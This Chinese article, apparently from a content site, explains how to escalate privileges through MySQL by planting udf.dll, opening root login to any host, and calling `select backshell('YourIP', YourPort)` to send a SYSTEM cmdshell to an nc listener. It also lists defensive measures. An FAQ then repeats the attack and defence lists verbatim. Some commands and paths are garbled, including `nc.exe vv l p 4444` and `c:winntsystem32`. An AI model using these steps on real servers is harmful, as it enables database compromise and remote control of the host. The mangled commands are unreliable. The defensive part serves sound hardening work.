MySQL数据库反弹端口连接提权_修改策略内容
在渗透或安全评估过程中,通过MySQL root账号和密码获取webshell但无法执行命令的情况时有发生,可以利用MySQL查询直接提权,具体条件和方法如下:
1、访问MySQL数据库:需要获取数据库root账号和密码,或者相当于root权限的账号和密码,同时能够执行查询命令,可以通过phpMyAdmin、Navicat for MySQL等客户端软件连接。
2、导出文件udf.dll:将udf.dll文件导出到系统目录或MySQL数据库安装目录下的lib/plugin目录,对于MySQL 5.1以下版本,导出到c:winntsystem32或c:windowssystem32目录;对于MySQL 5.1以上版本,则导出到MySQL安装目录下的plugin目录。
3、授权远程用户登录:修改mysql数据库中的user表,将host项从"localhost"改为"%",允许root用户从任何主机连接,具体方法包括本地登入mysql后执行update user set host=’%’ where user=’root’; FLUSH PRIVILEGES;或者直接授权从任何主机上使用root用户连接到mysql服务器。
4、执行查询命令:通过phpMyAdmin或Navicat for MySQL等工具执行查询命令,将mysql.txt文件中的最后一行代码修改为select backshell("YourIP", YourPort),本地开启监听反弹的端口,例如使用nc.exe vv l p 4444。
5、查看反弹结果:成功执行查询后,会获得一个system权限的cmdshell,在该shell下可以直接执行net user、whoami等命令查看当前权限。
防范方法
为了防范此类攻击,可以采取以下措施:
1、检查mysql数据库中user表授权的登录host:禁止具备Root账号权限的用户通过“%”进行登录。
2、禁止在网站CMS系统使用root账号进行配置。
3、设置root账号的密码为强密码。
4、对MySQL执行程序进行降权:禁止网站用户读取user.frm、user.myd、user.myi文件。
5、检查mysql数据库下的mysql表中是否存在其它无关表,检查func表中的内容。
6、在相应的目录下建立一个udf.dll空文件,并严格设置权限,任何人无读取和写入权限。
FAQs
问题1:如何防止MySQL被用于反弹端口连接提权?
答:为了防止MySQL被用于反弹端口连接提权,可以采取以下措施:
1、检查mysql数据库中user表授权的登录host,禁止具备Root账号权限的用户通过“%”进行登录。
2、禁止在网站CMS系统使用root账号进行配置。
3、设置root账号的密码为强密码。
4、对MySQL执行程序进行降权,禁止网站用户读取user.frm、user.myd、user.myi文件。
5、检查mysql数据库下的mysql表中是否存在其它无关表,检查func表中的内容。
6、在相应的目录下建立一个udf.dll空文件,并严格设置权限,任何人无读取和写入权限。
问题2:如何通过MySQL查询直接提权?
答:通过MySQL查询直接提权的步骤如下:
1、访问MySQL数据库,获取数据库root账号和密码,或者相当于root权限的账号和密码,同时能够执行查询命令,可以通过phpMyAdmin、Navicat for MySQL等客户端软件连接。
2、将udf.dll文件导出到系统目录或MySQL数据库安装目录下的lib/plugin目录,对于MySQL 5.1以下版本,导出到c:winntsystem32或c:windowssystem32目录;对于MySQL 5.1以上版本,则导出到MySQL安装目录下的plugin目录。
3、修改mysql数据库中的user表,将host项从"localhost"改为"%",允许root用户从任何主机连接,具体方法包括本地登入mysql后执行update user set host=’%’ where user=’root’; FLUSH PRIVILEGES;或者直接授权从任何主机上使用root用户连接到mysql服务器。
4、通过phpMyAdmin或Navicat for MySQL等工具执行查询命令,将mysql.txt文件中的最后一行代码修改为select backshell("YourIP", YourPort),本地开启监听反弹的端口,例如使用nc.exe vv l p 4444。
5、成功执行查询后,会获得一个system权限的cmdshell,在该shell下可以直接执行net user、whoami等命令查看当前权限。
原创文章,作者:未希,如若转载,请注明出处:https://www.kdun.com/ask/1101609.html
微信扫一扫